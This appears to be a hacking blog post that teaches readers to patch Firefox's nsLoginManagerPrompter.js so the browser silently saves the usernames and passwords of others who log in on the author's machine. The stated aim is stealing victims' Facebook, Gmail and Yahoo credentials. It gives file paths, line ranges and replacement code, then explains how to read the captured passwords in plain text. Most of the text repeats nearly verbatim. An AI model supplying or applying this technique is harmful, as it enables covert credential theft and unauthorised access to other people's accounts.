After reading my last post you must now be aware of how anyone can be Hacked by playing such easy pranks .Yet there are chances that the person you are trying to hack may be knowing Phishing or by mistakes had a look at the URL and personally goes to the real Facebook page and then logins so as not to get involved in any kind of risk . This definitely reduces your chances of success of Hacking him/her .
So in this post I will introduce a new way of hacking in which neither we are gonna install any Keyloggers nor making a Fake page and the plus point is that even if he/she logins on the real page of any site (Facebook, Gmail, Yahoo!) you will be getting his/her password!! Oh thats quite cool! Yeah it is! … But this
method also suffers from a drawback which Keylogger faced…Yes you need to convince the person to Login on your computer :( .Yet the chances are much higher than those using a Keylogger because rarely anyone knows about this trick .
Well, you must have seen that whenever you login through any browser on your computer , a Pop-up asks you ‘whether you want to save the Login details for this site or not’ most of the times people ignore this Pop-up because they know that this login details (Username and Password) get saved in the browser which anyone can view later on, putting a risk on their account.
But what if , the Username and Password gets saved silently in the background without getting into knowledge of the person??? I have tried using this trick in Mozilla Firefox browser because its quite easy in it.
And here is the trick for Mozilla Firefox :
Step 1. Goto components folder of your Firefox man directory ( like the default location is ,C:\Program Files\Mozilla firefox\Components and open the file nsLoginManagerPrompter.js in any text editor (preferably in notepad++)
Step 2.Go to the _showSaveLoginNotification function and remove everything between lines 642 to 711, or until you find the _removeLoginNotifications funtion, if you’re going to use the Search (Ctrl+F) feature instead of checking the line number.
Step 3. Replace that section with these two lines of code:
var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);
Step 4.Save this file and open Firefox.
Thats all! Now you are ready to play the trick on any anyone.Whenever anyone will Login with this browser ,the Username and Password will be saved without his/her confirmation.
You can later view all the saved Username and Password from tools>options>security tab>saved passwords. They are all written in plane text instead of any encrypted form.
So in this post I will introduce a new way of hacking in which neither we are gonna install any Keyloggers nor making a Fake page and the plus point is that even if he/she logins on the real page of any site (Facebook, Gmail, Yahoo!) you will be getting his/her password!! Oh thats quite cool! Yeah it is! … But this
method also suffers from a drawback which Keylogger faced…Yes you need to convince the person to Login on your computer :( .Yet the chances are much higher than those using a Keylogger because rarely anyone knows about this trick .
Well, you must have seen that whenever you login through any browser on your computer , a Pop-up asks you ‘whether you want to save the Login details for this site or not’ most of the times people ignore this Pop-up because they know that this login details (Username and Password) get saved in the browser which anyone can view later on, putting a risk on their account.
But what if , the Username and Password gets saved silently in the background without getting into knowledge of the person??? I have tried using this trick in Mozilla Firefox browser because its quite easy in it.
And here is the trick for Mozilla Firefox :
Step 1. Goto components folder of your Firefox man directory ( like the default location is ,C:\Program Files\Mozilla firefox\Components and open the file nsLoginManagerPrompter.js in any text editor (preferably in notepad++)
Step 2.Go to the _showSaveLoginNotification function and remove everything between lines 642 to 711, or until you find the _removeLoginNotifications funtion, if you’re going to use the Search (Ctrl+F) feature instead of checking the line number.
Step 3. Replace that section with these two lines of code:
var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);
Step 4.Save this file and open Firefox.
Thats all! Now you are ready to play the trick on any anyone.Whenever anyone will Login with this browser ,the Username and Password will be saved without his/her confirmation.
You can later view all the saved Username and Password from tools>options>security tab>saved passwords. They are all written in plane text instead of any encrypted form.
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